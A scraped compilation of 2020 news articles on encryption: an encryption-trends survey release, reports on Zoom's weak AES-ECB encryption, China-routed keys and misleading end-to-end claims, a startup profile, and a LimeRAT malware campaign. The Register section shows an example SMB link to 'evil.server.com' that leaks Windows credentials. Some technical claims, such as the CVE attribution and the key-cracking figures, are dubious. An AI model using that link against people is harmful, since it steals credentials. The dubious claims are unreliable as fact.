Organizations racing to protect sensitive data as it proliferates across cloud, IoT devices and 5G networks

As organizations accelerate digital initiatives such as cloud and the internet of things (IoT), and data volumes and types continue to rise, IT professionals cite protection of customer personal information as their number one priority, according to the 2020 Global Encryption Trends Study from the Ponemon Institute.

This press release features multimedia. View the full release here: https://www.businesswire.com/news/home/20200407005297/en/

The Ponemon Institute has collaborated with nCipher Security, an Entrust Datacard company and world leader in hardware security modules (HSMs), on this multinational survey of how and why organizations deploy encryption, now in its fifteenth year.

Threats, drivers and priorities

For the first time, protecting consumer personal information is the top driver for deploying encryption (54% of respondents), outranking compliance, which ranked fourth (47%). Traditionally compliance with regulations was the top driver for deploying encryption, but has dropped in priority since 2017, indicating that encryption is transitioning from a requirement to a proactive choice to safeguard critical information.

Employee mistakes continue to be the biggest threat to sensitive data (54%) and significantly outweigh concerns over attacks by hackers (29%), or malicious insiders (20%). In contrast, the least significant threats cited include government eavesdropping (11%) and lawful data requests (12%).

Data discovery the number one challenge

With the proliferation of data from digital initiatives, cloud use, mobility, IoT devices and the advent of 5G networks, data discovery continues to be the biggest challenge in planning and executing a data encryption strategy, with 67% of respondents citing this as their top concern. And that is likely to increase, with a pandemic-driven surge in employees working remotely, using data at home, creating extra copies on personal devices and cloud storage.

Blockchain, quantum and adoption of new encryption technologies

The study indicates that 48% of organizations have adopted encryption strategies across their enterprises, up from 45% in 2019. With encryption deployment steadily growing, how are organizations looking ahead? In the near term, 60% of organizations plan to use blockchain, with cryptocurrency/wallets, asset transactions, identity, supply chain and smart contracts cited at the top use cases.

Other much-hyped technologies are not on IT organizations near-term radar. Most IT professionals see the mainstream adoption of multi-party computation at least five years away, with mainstream adoption of homomorphic encryption more than six years away, and quantum resistant algorithms over eight years out.

Trust, integrity, control

The use of hardware security modules (HSMs) continues to grow, with 48% of respondents deploying HSMs to provide a hardened, tamper-resistant environment with higher levels of trust, integrity and control for both data and applications. Organizations in Germany, the United States and Middle East are more likely to deploy HSMs, with Australia, Germany and the United States most likely to assign importance to HSMs as part of their organizations encryption or key management activities.

HSM usage is no longer limited to traditional use cases such as public key infrastructure (PKI), databases, application and network encryption (TLS/SSL). The demand for trusted encryption for new digital initiatives has driven significant HSM growth for big data encryption (up 17%) code signing (up 12%), IoT root of trust (up 10%) and document signing (up 7%). Additionally, 35% of respondents report using HSMs to secure access to public cloud applications.

The race to the cloud

Eighty-three percent of respondents report transferring sensitive data to the cloud, or planning to do so within the next 12 to 24 months, with organizations in the United States, Brazil, Germany, India and South Korea doing so most frequently.

In the next 12 months, respondents predict a significant increase in the ownership and operation of HSMs to generate and manage Bring Your Own Key (BYOK), and integration with a Cloud Access Security Broker (CASB) to manage keys and cryptographic operations. The survey found that the most important cloud encryption features are:

Story continues

"Consumers expect brands to keep their data safe from breaches and have their best interests at heart. The survey found that IT leaders are taking this seriously, with protection of consumer data cited as the top driver of encryption growth for the first time," says Dr Larry Ponemon, chairman and founder of Ponemon Institute. "Encryption use is at an all-time high with 48% of respondents this year saying their organization has an overall encryption plan applied consistently across the entire enterprise, and a further 39% having a limited plan or strategy applied to certain application and data types."

"As the world goes digital, the impact of the global pandemic highlights how security and identity have become critical for organizations and individuals both at work and at home," says John Grimm vice president of strategy at nCipher Security. "Organizations are under relentless pressure to deliver high security and seamless access protecting their customer data, business critical information and applications while ensuring business continuity. nCipher empowers customers by providing a high assurance security foundation that ensures the integrity and trustworthiness of their data, applications and intellectual property."

Other key trends include:

Download the 2020 Global Encryption Trends Study here.

2020 Global Encryption Trends Study methodology

The 2020 Global Encryption Trends Study, based on research by the Ponemon Institute, captures how organizations around the world are dealing with compliance, increased threats, and the implementation of encryption to protect their business critical information and applications. 6,457 IT professionals were surveyed across multiple industry sectors in 17 countries/regions: Australia, Brazil, France, Germany, India, Japan, Hong Kong, Mexico, the Middle East (which is a combination of respondents located in Saudi Arabia and the United Arab Emirates), the Russian Federation, Southeast Asia (Indonesia, Malaysia, Philippines, Thailand, and Vietnam), South Korea, Taiwan, the United Kingdom, the United States and two new regions for the first time, Netherlands and Sweden.

About nCipher Security

nCipher Security, an Entrust Datacard company, is a leader in the general-purpose hardware security module (HSM) market, empowering world-leading organizations by delivering trust, integrity and control to their business-critical information and applications. Todays fast-moving digital environment enhances customer satisfaction, gives competitive advantage and improves operational efficiency it also multiplies the security risks. Our cryptographic solutions secure emerging technologies such as cloud, IoT, blockchain, and digital payments and help meet new compliance mandates. We do this using our same proven technology that global organizations depend on today to protect against threats to their sensitive data, network communications and enterprise infrastructure. We deliver trust for your business-critical applications, ensure the integrity of your data and put you in complete control today, tomorrow, always. http://www.ncipher.com

Follow us on LinkedIn, Twitter, Facebook and Instagram search nCipherSecurity.

View source version on businesswire.com: https://www.businesswire.com/news/home/20200407005297/en/

Contacts

nCipher Security Liz Harris liz.harris@ncipher.com +44 7973 973648

View post:
Customer Personal Information Is the Number One Data Protection Priority nCipher 2020 Global Encryption Trends Study - Yahoo Finance

Meetings on Zoom, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zooms waiting room feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the universitys Citizen Lab widely followed in information security circles that Zooms service is not suited for secrets and that it may be legally obligated to disclose encryption keys to Chinese authorities and responsive to pressure from them.

Zoom could not be reached for comment.

Earlier this week, The Intercept reported that Zoom was misleading users in its claim to support end-to-end encryption, in which no one but participants can decrypt a conversation. Zooms Chief Product Officer Oded Gal later wrote a blog post in which he apologized on behalf of the company for the confusion we have caused by incorrectly suggesting that Zoom meetings were capable of using end-to-end encryption. The post went on to detail what encryption the company does use.

Diagram of how Zoom meetings work.

Zoom

Based on a reading of that blog post and Citizen Labs research, here is how Zoom meetings appear to work:

When you start a Zoom meeting, the Zoom software running your device fetches a key with which to encrypt audio and video. This key comes from Zooms cloud infrastructure, which contains servers around the world. Specifically, it comes from a type of server known as a key management system, which generates encryption keys and distributes them to meeting participants. Each user gets the same, shared key as they join the meeting. It is transmitted to the Zoom software on their devices from the key management system using yet another encryption system, TLS, the same technology used in the https protocol that protects websites.

Depending on how the meeting is set up, some servers in Zooms cloud called connectors may also get a copy of this key. For example, if someone calls in on the phone, theyre actually calling a Zoom Telephony Connector server, which gets sent a copy of the key.

Some of the key management systems 5 out of 73, in a Citizen Lab scan seem to be located in China, with therest in the United States. Interestingly, the Chinese servers are at least sometimes used for Zoom chats that have no nexus in China. The two Citizen Lab researchers who authored the report, Bill Marczak and John Scott-Railton, live in the United States and Canada. During a test call between the two, the shared meeting encryption key was sent to one of the participants over TLS from a Zoom server apparently located in Beijing, according to the report.

The report points out that Zoom may be legally obligated to share encryption keys with Chinese authorities if the keys are generated on a key management server hosted in China. If the Chinese authorities or any other hypothetical attacker with access to a key wants to spy on a Zoom meeting, they also need to either monitor the internet access of a participant in the meeting, or monitor the network inside the Zoom cloud. Once they collect the encrypted meeting traffic, they can use the key to decrypt it and recover the video and audio.

Citizen Lab flagged as worrisome not only the system used to distribute Zoom encryption keys but also the keys themselves and the way they are used to encrypt data.

Zooms keys conform to the widely used Advanced Encryption Standard, or AES. A security white paper from the company claims that Zoom meetings are protected using 256-bit AES keys, but the Citizen Lab researchers confirmed the keys in use are actually only 128-bit. Such keys are still considered secure today, but over the last decade many companies have been moving to 256-bit keys instead.

Furthermore, Zoom encrypts and decrypts withAES usingan algorithm calledElectronic Codebook, or ECB, mode, which is well-understood to be a bad idea, because this mode of encryption preserves patterns in the input, according to the Citizen Lab researchers. In fact, ECB is considered the worst of AESs available modes.

Heres why: It should be impossible to tell the difference between properly encrypted data and completely random data, such as static on a radio, but ECB mode fails to do this. If theres a pattern in the unencrypted data, the same pattern shows up in the encrypted data. This Wikipedia page has a useful illustration to visualize this:

Patterns appearing in data encrypted with AES in ECB mode.

Wikipedia

Once it has been poorly encrypted in this manner, video and audio data is distributed to all participants in a meeting through a Zoom Multimedia Router server. For most users, this server runs in Zooms cloud, but customers can choose to host this part on-premises. In this case, Zoom will generate, and thus have access to, the AES key that encrypts the meeting but shouldnt have access to the meeting content itself, so long as none of the aforementioned connector servers (for phone calls and so forth) are participating in the meeting. (In its blog post, Zoom said self-hosting customers will eventually be able to manage their own encryption keys.)

Meeting hosts can settheir meetings to have virtual waiting rooms, making it so that users do not directly enter the meeting when they log on with Zoom but instead must wait to be invited in by a participant. The Citizen Lab researchers discovered a security vulnerability with this feature while conducting their encryption analysis. They said in their report that they have disclosed the vulnerability to Zoom but that we are not currently providing public information about the issue to prevent it from being abused. In the meantime, the researchers advised Zoom users who desire confidentiality to avoid using waiting rooms and instead set passwords on meetings.

The newly uncovered flaws in Zooms encryption may be troubling for many of the companys customers. Since the coronavirus outbreak started, Zooms customer base has surged from 10 million users to 200 million, including over 90,000 schools across 20 countries, according to a blog post by Zoom CEO Eric Yuan. The U.S. government recently spent $1.3 million on Zoom contracts as part of its response to the pandemic, according to a review of government contracts by Forbes, and the U.K. government has been using Zoom for remote Cabinet meetings, according to a tweet from Prime Minister Boris Johnson.

Among those who should be concerned about Zooms security issues, according to Citizen Lab, are governments worried about espionage and businesses concerned about cybercrime and industrial espionage.

Despite a recent flood of security and privacy failures, Yuan, Zooms CEO, appears to be listening to feedback and making a real effort to improve the service. These new, mostly consumer use cases have helped us uncover unforeseen issues with our platform. Dedicated journalists and security researchers have also helped to identify pre-existing ones, Yuan wrote in his blog post. We appreciate the scrutiny and questions we have been getting about how the service works, about our infrastructure and capacity, and about our privacy and security policies.

In addition to promptly fixing several security issues that were reported, the company removed an attendee attention tracker feature, a privacy nightmare which let meeting hosts track whether participants had the Zoom window or some other apps window in focus during a meeting. It has also invested in new training materials to teach users about the security features like setting passwords on meetings to avoid Zoom-bombing, the phenomenon where people disrupt unprotected Zoom meetings.

Because Zooms service is not end-to-end encrypted, and the company has access to all encryption keys and to all video and audio content traversing its cloud, its possible that governments around the world could be compelling the company to hand over copies of this data. If Zoom does help governments spy on its users, the company claims that it hasnt built tools specifically to help law enforcement: Zoom has never built a mechanism to decrypt live meetings for lawful intercept purposes, Gal, Zooms chief product officer, wrote in the technical blog post, nor do we have means to insert our employees or others into meetings without being reflected in the participant list.

Unlike some other tech companies, Zoom has never released any information about how many government requests for data it gets, and how many of those requests it complies with. But after the human rights group Access Nows open letter urging Zoom to publish a transparency report, Yuan also promised to do just that. Within the next three months, the company will prepare a transparency report that details information related to requests for data, records, or content. Access Now has commended Zoom on committing to publish a transparency report.

Read this article:
Zoom's Flawed Encryption Linked to China - The Intercept

Ahack is no longer just about exposing a bank account or somebodys photos. There can be far scarier fallouts. Satellite systems can be hacked to spoof GPS signals, for example, and send drones to the wrong destination or hijack oil tankers.

Time was when randomly generated binary number sequences were good enough for symmetric encryption of streaming data. But in todays world of grid and cloud computing, those are can be cracked easily, says Jay Hotti, co-founder and CEO of cybersecurity startup Byneri, based in Bengaluru and Singapore.

Encryption tries to stay one up on hackers by adding algorithmic layers of security on top of the binary sequences. The data encryption standard was adopted in 1977 and superseded by the advanced encryption standard in 2001. RC4 was a secret cipher until it got leaked.

Another algorithm is Blowfish which has been superseded by Twofish. They use different mechanisms to add security, but each introduces new challenges and vulnerabilities, explains Hotti. The more steps you introduce in any encryption, the more potential weaknesses you expose. And you never know what you dont know until somebody hits that, which happens now and then."

Layers of complexity

Byneri goes to a more fundamental level of strengthening the underlying binary sequences. The mathematics to generate such sequences was developed in the late 1960s and early seventies by US DARPA (Defence Advanced Research Projects Agency). Later, when the internet exploded at the turn of the millennium, asymmetric encryption arrived, using prime numbers where a public key is used to encrypt a message and a private key to decrypt it.

Asymmetric encryption is mainly used for identification and authentication. But most online systems, such as payments, still depend on symmetric encryption where one key is used for both encryption and decryption. Thats because asymmetric encryption would become unwieldy with large amounts of data.

This brings us to Byneris innovation, which goes to the roots of symmetric encryption. We can generate binary sequences whose linear complexity is many orders of magnitude more than the existing ones. And were able to do this very fast," says Hotti.

The linear complexity determines the strength of an encryption key," adds angel investor P.G. Ponnapa, who is working with Byneri. A 1024-bit key can be cracked with 10 to the power of six permutations. The Byneri way raises that to 10 to the power of 154 permutations."

One of its early testers is a company making receivers for low earth orbit (LEO) satellites, typically used for applications involving GPS. The overcrowding in space means these receivers have to distinguish between the many satellites in their view. To do this, they needed a large number of binary sequences which couldnt have been done with their existing system," says Hotti.

Going to market with such a highly technical black box product is a challenge. Ponnapa experienced this himself when he first heard the idea of Byneri. I have known Jay 35 years. We were in college together (NIT Surathkal). When he told me he had cracked this, I met him for dinner. Two hours later, I had understood nothing," says Ponnapa with a smile. He met Hotti again the next day with more specific questions, and the penny dropped.

Hottis involvement with cryptography goes back to his work with payment systems. He worked on Thailands national payment system and implemented Indias first payment network, Swadhan for the Indian Banks Association in the nineties. That was the basis of how shared ATM networks started in India," says Hotti, who was also CTO of Singapores payment gateway and merchant payment network NETS.

Multiple uses

Hottis co-founder is Professor Mahalinga V Mandi of the Ambedkar Institute of Technology in Bengaluru, who was researching the application of binary sequences in satellite communication and navigation. He was initially sceptical when Hotti suggested it could also be applied in banking and other industries. I kept pestering him and we ended up making a matrix of implementations in 14 industry types."

It took them two-and-a-half years to develop the product and test it. Then we went to a space company last year. They tried it on heterogeneous systems and it worked. Thats when we decided to raise some money. Until then it was funded by our own money."

Byneri has also been talking to a tech company that provides solutions to space companies. The order confirmation came last month, just before the country went into a lockdown.

Sumit Chakraberty is a Consulting Editor with Mint. Write to him at chakraberty@gmail.com

See the rest here:
This startup is going back to basics to strengthen encryption - Livemint

Two separate reports have revealed further issues within popular video-conferencing app Zoom.

First up, a report from The Verge notes that a security professional has used an automated tool that can scour meetings to find ones that are not protected by passwords. Apparently, it was able to find 2,400 calls in a single day, extracting a link to meeting, date, time, organizer and meeting topic information. From the report:

Security professional Trent Lo and members of SecKC, a Kansas City-based security meetup group, made a program called zWarDial that can automatically guess Zoom meeting IDs, which are nine to 11 digits long, and glean information about those meetings, according to the report.

In addition to being able to find around 100 meetings per hour, one instance of zWarDial can successfully determine a legitimate meeting ID 14 percent of the time, Lo told Krebs on Security. And as part of the nearly 2,400 upcoming or recurring Zoom meetings zWarDial found in a single day of scanning, the program extracted a meeting's Zoom link, date and time, meeting organizer, and meeting topic, according to data Lo shared with Krebs on Security.

In a statement to The Verge regarding this issue Zoom said:

"Zoom strongly encourages users to implement passwords for all of their meetings to ensure uninvited users are not able to join... Passwords for new meetings have been enabled by default since late last year, unless account owners or admins opted out. We are looking into unique edge cases to determine whether, under certain circumstances, users unaffiliated with an account owner or administrator may not have had passwords switched on by default at the time that change was made."

A second separate report from The Intercept published today claims that Zoom's encryption algorithm has "serious, well-known weaknesses" and that keys are being issued by servers sometimes based in China, even if all the participants are based in the US.

MEETINGS ON ZOOM, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom's "waiting room" feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university's Citizen Lab widely followed in information security circles that Zoom's service is "not suited for secrets" and that it may be legally obligated to disclose encryption keys to Chinese authorities and "responsive to pressure" from them.

Zoom has not commented further on this issue, which was also reported by Forbes who note:

"...in an interview published on Forbes on Friday, Chief Executive Eric Yuan said the company was going to check on how it was routing conversations to China, but emphasized the data was protected. As Citizen Lab hadn't sent its findings to Zoom, saying it was in the public interest to release the information as soon as possible, the videoconferencing company wouldn't have been aware of the findings. But Yuan assured that if user data was being transferred to China when users weren't even based there, "we are willing to address that."

Security concerns regarding Zoom are now seemingly well noted in the community. The encouraging sign is that Zoom has taken notice, apologized and vowed to fix all of these issues over the next 90 days, freezing new features in the meantime.

Go here to read the rest:
Zoom's encryption has 'serious, well-known weaknesses', according to report - Android Central

A new campaign is spreading the LimeRAT Remote Access Trojan by harnessing an old encryption technique in Excel files.

LimeRAT is a simple Trojan designed for Windows machines. The malware is able to install backdoors on infected machines and encrypt files in the same way as typical ransomware strains, add PCs to botnets, and install cryptocurrency miners.

See also:This Trojan hijacks your smartphone to send offensive text messages

In addition, the modular Trojan can spread through connected USB drives, uninstall itself if a virtual machine (VM) is detected -- a typical practice for security researchers attempting to reverse-engineer malware -- lock screens, and steal a variety of data which is then sent to a command-and-control (C2) server via AES encryption.

In a new campaign observed by Mimecast, the Trojan is being hidden as a payload in read-only Excel documents spread via phishing emails. Researchers said in a blog post on Tuesday that the Excel documents are read-only -- rather than locked -- which encrypts the file without making a user type in a password.

To decrypt the file, on open, Excel will attempt to use an embedded, default password, "VelvetSweatshop," which was implemented years ago by Microsoft programmers. If successful, this decrypts the file and allows onboard macros and the malicious payload to launch, while also keeping the document read-only.

CNET:Using Zoom while working from home? Here are the privacy risks to watch out for

Usually, if decryption through VelvetSweatshop fails, then users are required to submit a password. However, read-only mode bypasses this step, thereby reducing the steps required to compromise a Windows machine.

"The advantage of the read-only mode for Excel to the attacker is that it requires no user input, and the Microsoft Office system will not generate any warning dialogs other than noting the file is read-only," the researchers say.

TechRepublic:FBI warns about Zoom bombing as hijackers take over school and business video conferences

The new campaign designed to spread LimeRAT makes use of this technique, which was first spotted back in 2013 and presented at a Virus Bulletin conference. In order to pull off a successful attack, the hardcoded password -- assigned as CVE-2012-0158 -- is exploited.

It is worth noting this issue was addressed a long time ago; however, Sophos notes (.PDF) that the vulnerability has continued to be exploited over the years in a case deemed "remarkable."

Mimecast says the cyberattackers also use a "blend of other techniques in an attempt to fool anti-malware systems by encrypting the content of the spreadsheet hence hiding the exploit and payload."

Microsoft has been made aware that the vulnerability is once again in use.

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

The rest is here:
LimeRAT malware is being spread through VelvetSweatshop Excel encryption technique - ZDNet

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of the first ever digital Cabinet on his Twitter feed. It revealed the countrys most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That's a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app's business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an end-to-end encrypted conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between devices so that not even the organization hosting the service has access to the contents of the connection. With TLS, Zoom can intercept and decrypt video chats and other data.

Despite Zoom offering a meeting host the option to enable an end-to-end (E2E) encrypted meeting, and providing a green padlock that claims Zoom is using an end to end encrypted connection, it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it's not E2E.

While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.

Then they gave their own Zoom version of what the phrase end-to-end encryption actually means: When we use the phrase End to End in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point, a spokesperson told The Intercept on Tuesday.

The use of end point in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.

Thats not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a "creepily chummy" relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included "the content contained in cloud recordings, and instant messages, files, whiteboards ... shared while using the service."

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom's iOS app sent analytics data to Facebook even if you didn't use Facebook to sign into Zoom, due to the application's use of the social network's Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn't say anything about what happens if you don't use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don't use it to sign into the video-conferencing app.

Zoom also stupidly glomed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zooms privacy policy and practices and didn't like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users data.

The growing demand for Zooms services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information, said Access Nows general counsel Peter Micek. This is why just disclosing privacy policies is not enough its high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app, the lawsuit argued.

In short, while Zooms ease of use, reliability and excellent user interface has made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. Something that a countrys head of government would do well to consider before posting screengrabs of online meetings.

Stop press... Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: "We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data."

It continued: "Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host ... We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites."

It, thus, appears to have clarified, among other things, that it, at least now, does not use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people's Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \evil.server.comfoorbar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user's credentials in hope of fetching foobar.jpg. Swap foobar.jpg for malware.exe and you could get code execution on the victim's computer.

Sponsored: Webcast: Build the next generation of your business in the public cloud

Read more here:
Zoom's end-to-end encryption isn't actually end-to-end at all. Good thing the PM isn't using it for Cabinet calls. Oh, for f... - The Register